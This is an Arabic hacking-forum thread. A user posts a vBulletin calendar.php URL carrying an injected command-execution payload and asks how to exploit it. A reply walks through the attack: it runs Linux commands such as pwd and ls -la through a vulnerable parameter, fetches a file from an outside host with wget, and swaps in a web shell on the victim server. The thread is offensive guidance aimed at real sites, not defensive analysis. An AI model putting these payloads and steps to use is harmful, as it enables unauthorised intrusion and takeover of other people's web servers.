قبل إضافة استفسارك ولكي لا يتعرض للحذف، أو ان تتعرض أنت للحظر، اقرأ قوانين قسم الإستفسارات
لقد وجدت هذة الثغرة و ارجو ان تفيدونى كيف استغلال هذة xxxx.com/calender.php?calbirthdays=1&actions=getday&day=200 1-8-15& comma=%22;echo%20' ' ,%20echo%20%60id%20%60;die<>;echo%22 : vbulletin allows remote command execution ارجوكم
أخي الكريم ثغرات ال cgi او هي عبارة عن ثغرة تسمح بتنفيذ أوامر اللينكس على السرفر مثلا معك الوقع مصاب بالثغرة target.com و الإصابة هنا =file.php?id سيكون الاستغلال هكذا لمعرفة مسارك على السرفر target.com/file.php?id=pwd و file.php?id=ls -la لمعرفة الملفات على المجلد اللي أنت عليه الآن و wget http://www.....com/file.zip لتنزيل الملف المطلوب على المجلد اللي أنت عليه ... استبدل الملف بالشل و عيش --------------------- أخي هناك الكثير من الدورات القيمة في المنتدى أنصحك بها
قوانين المنتدى